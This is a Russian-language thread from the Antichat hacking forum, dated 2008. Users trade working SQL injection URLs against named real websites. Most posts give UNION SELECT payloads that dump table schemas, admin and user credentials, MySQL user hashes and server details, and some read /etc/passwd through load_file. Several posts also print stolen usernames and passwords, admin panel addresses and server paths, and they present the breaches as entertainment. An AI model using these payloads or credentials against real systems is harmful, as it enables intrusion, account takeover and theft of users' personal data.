Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
23.06.2008, 01:15
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Splitreason.com - PR 5
http://www.splitreason.com/productdetail.php?id=-508+union+select+1,2,3,table_name,5,6,7,8,9,10,11, 12,13,14,15+from+information_schema.tables+limit+1 01,1/*
Последний раз редактировалось sabe; 23.06.2008 в 17:34..
|
|
|
23.06.2008, 01:58
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме:
2252257
Репутация:
627
|
|
Сообщение от sabe
Splitreason.com - PR 5
Немогу достать админа..)
Колонки
Код:
http://www.splitreason.com/productdetail.php?id=-508+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x5553455253+limit+0,100/*
Юзер/пасс
Код:
http://www.splitreason.com/productdetail.php?id=-508+union+select+1,2,3,concat(USERNAME,char(58),PASSWORD),5,6,7,8,9,10,11,12,13,14,15+from+users+limit+1,100/*
Make fun!
______________
159932, ты опоздал на 3 минуты))
Последний раз редактировалось Лайт; 23.06.2008 в 02:11..
Причина: Антибойан
|
|
|
|
23.06.2008, 02:01
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
Сообщение от sabe
Splitreason.com - PR 5
Немогу достать админа..)
http://www.splitreason.com/productdetail.php?id=-508+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user _id,user_type_id,username,password,credit,point_to tal),9,10,11,12,13,14,15+from+users+limit+39111,1/*
~39к юзверей
|
|
|
|
23.06.2008, 14:27
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://alex.state.al.us/lesson_view.php?id=-1961+union+select+concat(user,0x3a,password,0x3a,h ost)+from+mysql.user+limit+1,1/*
root:6268a4a308ce2246:alex3.asc.edu:Monday1
test:2e8ff8cf35525756:nagios.asc.edu
root:6268a4a308ce2246:%Monday1
test:2e8ff8cf35525756:intranet.asc.edu
root:6268a4a308ce2246:129.66.12.21:Monday1
phpesp:6268a4a308ce2246:alex.asc.edu:Monday1
http://alex.state.al.us/admin/contextAdmin/contextAdmin.jsp?submit=Add+Context&addContextPath =&addContextDocBase=&removeContextName=
http://alex.state.al.us/lesson_view.php?id=-1961+union+select+concat_ws(0x3a,user_name,passwor d)+from+user+limit+16111,1/*
16к юзеров
http://alex.state.al.us/phpinfo.php
================================================
http://www.onradio.gr/LoadMedia.php?id=-372+union+select+1,concat_ws(0x3a,user,pass),3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+member s+limit+0,1
http://www.onradio.gr/admin/index.php
george:stelios
есть cpanel - но не грузит ((
https://onradio.gr:2083/
================================================
http://www.popart.gr/news_alone.php?id=-19+union+select+1,password,username,4,5,6,7,8+from +users+limit+0,1/*
vm_admin:686c821a80914aef822465b48019cd34:vm
|
|
|
|
23.06.2008, 14:55
|
|
Новичок
Регистрация: 17.07.2007
Сообщений: 5
Провел на форуме:
39561
Репутация:
4
|
|
http://www.aclosport.nl/index.php?s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10
http://sportdreams.nl/news.php?lang=uk&template=news&id=-1+UNION+SELECT+1,2,3,4
http://www.nationmultimedia.com/breakingnews/read.php?newsid=-1+union+select+1,2,3,4,5,6,7,8,9,10
http://www.guitarnoise.com/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
http://viet.vietnamembassy.us/tintuc/story.php?d=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
http://www.ramld.ru/books/book.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
http://www.tokiavto.ru/pages.php?id=-1+union+select+1,2,3
|
|
|
|
23.06.2008, 16:04
|
|
Новичок
Регистрация: 29.05.2008
Сообщений: 12
Провел на форуме:
134986
Репутация:
13
|
|
Ляпис Трубецкой рулит))
http://www.lyapis.com/anons.php?id=-1+union+select+1,user,3,4,5/*
Database Version: 4.1.22-standard
Database name: lyapis_lyapis
User name: lyapis_lyapis@localhost
Последний раз редактировалось bakl; 23.06.2008 в 16:06..
|
|
|
|
23.06.2008, 17:43
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме:
2252257
Репутация:
627
|
|
Сегодня на нашем операционном столе сайт alfavideo.ru от группы компаний альфа арсенал, системы безопасности, аж самому смешно, хорошая у них безопасность)))).
Приступим:
Имена таблиц
http://www.alfavideo.ru/services?pg=-9+union+select+1,TABLE_NAME+FROM+INFORMATION_SCHEM A.TABLES+limit+27,1/*
Колонки в таблице tbl_m_user
http://www.alfavideo.ru/services?pg=-9+union+select+1,COLUMN_NAME+FROM+INFORMATION_SCHE MA.COLUMNS+WHERE+TABLE_NAME=0x74626C5F6D5F75736572 +limit+1,1/*
Получаем всю инфу по админам
http://www.alfavideo.ru/services?pg=-9+union+select+1,concat(login,char(58),pass,char(5 8),email,char(58),r_name,char(58),phone,char(58),g roup_id,char(58),deleted)+FROM+tbl_m_user+limit+0, 1/*
Собстно логин и пасс 3х админчигов, которые были получены.
Steel:k15Xsp3
pro:k15Xsp3
Topotun:k15Xsp3
И админка: http://www.alfavideo.ru/admin/
Make fun! |
|
|
|
23.06.2008, 22:44
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
pr 3
http://www.crimelab.nl/csi.php?series=6666+union+select+111,version(),333 ,444,555,666,777,888,999,110,111,112,113,114,115,1 16,117,118,119,220,221,2221/*&page=index2
5.0.32-Debian_7etch5-log::crimelab@localhost::crimelab
Присутствует раскрытие путей: /home/aidoann/crimelab/welcome.html
Сообщение от Таблицы
albums.cpg11d_users
(http://www.crimelab.nl/csi.php?series=6666+union+select+1,concat_ws(0x2e, table_schema,table_name),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,21+from+information_schem a.tables+limit+25,1/*&page=index2)
Сообщение от колонки
user_id,user_name,user_password,user_email
1 запись(liberque:::78ArK71)
albums.cpg1_users
http://www.crimelab.nl/csi.php?series=6666+union+select+1,concat_ws(0x2e, table_schema,table_name),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,21+from+information_schem a.tables+limit+38,1/*&page=index2)
Сообщение от колонки
user_id,user_name,user_password,user_email
две записи (admin:::78ArK71 и liberque:::78ArK71:::liberque@liberque.nl)
inches.phpbb_users
(http://www.crimelab.nl/csi.php?series=6666+union+select+1,concat_ws(0x2e, table_schema,table_name),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,21+from+information_schem a.tables+limit+97,1/*&page=index2)
Сообщение от колонки
user_id,username,user_password,user_email
здесь 149 записей
есть так же файл прив:
http://www.crimelab.nl/csi.php?series=6666+union+select+1,load_file(0x2f6 574632f706173737764),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,21/*&page=index2
Наслаждайтесь
Последний раз редактировалось gisTy; 24.06.2008 в 05:04..
|
|
|
|
23.06.2008, 23:24
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Поддержим лоад_филе
Код:
http://www.747.ru/board/main/show/?id=-9999+union+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10/*
Red_Red1 спс.
Последний раз редактировалось Ch3ck; 23.06.2008 в 23:26..
|
|
|
|
24.06.2008, 05:02
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
PR 7
http://www.lib.umich.edu/grad/guide/guide.php?id=-4+union+select+1,2,concat_ws(char(58),id,name,uniq name,email),4,5,null,null,8,9+from+selector/*
PR 5
http://www.expressionindesign.com/post.php?id=29'+union+select+1,2,concat_ws(0x3a3a, version(),user(),database()),4,5,6,7,8,9,10,11,12, 13,14/*
version():5.0.27-standard-log
user():expressionin@76.12.19.204
database():expressionin
Есть раскрытие путей:
Код:
/vservers/expressionin/htdocs/
Есть интересная табличка:
Expressionin.users
--id,username,password,email
PR 4
http://www.mallenbaker.net/blog/post.php?id=-63+union+select+unhex(hex(concat_ws(0x3a3a,version (),user(),database()))),2,3/*
version():4.1.11-Debian_4sarge8-log
user():mallen@localhost
database():mallen
PR 3
http://www.hornets247.com/post.php?id=-55+union+select+1,2,concat(version(),0x3a3a,user() ,0x3a3a,database()),4,5/*
version():4.0.27-max-log
user():hornets247_v4_0@linhost194.prod.mesa1.secureserver .net
database():hornets247_v4_0
PR 3
http://blog.pmaster.net/post.php?id=-380+union+select+1,concat(version(),0x3a3a,user(), 0x3a3a,database()),null,null,null,null,null,null,n ull,null,11/*
version():4.1.22-log
user():pmaste_blog@localhost
database():pmaste_pmblog
Есть раскрытие путей:
/home/pmaste/public_html/blog/post.php
PR 3
http://www.elgranpoder.com/html/post.php?id=-165+union+select+1,2,3,4,5,concat_ws(0x3a3a,versio n(),user(),database()),7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24/*
version():[b] 5.0.45-log
user():myelgranpode@localhost
database():wp3
PR 3
http://www.r31-rabota.ru/post.php?id=4481+union+select+1,concat_ws(0x3a3a,v ersion(),user(),database()),3,4,5,6,7,8,9,10,null, null,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
version():4.1.21-standard-log
user():pro_rabot@localhost
database():pro_r31rabota
PR 1
http://www.leoq2.com/board/post.php?id=-732+union+select+1,2,3,4,5,null,concat_ws(0x3a3a,v ersion(),user(),database()),8,9/*
version():5.0.24alyceu
user():leoq2_com@eu1349f.lyceu.net
database():leoq2_com_1
PR N/A
http://caxton.emich.edu/guide/guide.php?id=-237+union+select+1,2,concat_ws(char(58),id,name,un iqname,email),4,5,null,null,8,9+from+selector/*
PR N/A
http://www.ieei.pt/programas/post.php?id=38+union+select+concat_ws(0x3a3a,versi on(),user(),database()),2,3/*
version():4.0.26
user():ieeiuse_web@216.81.72.128
database():ieeiuse_db
Последний раз редактировалось gisTy; 03.07.2008 в 08:57..
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
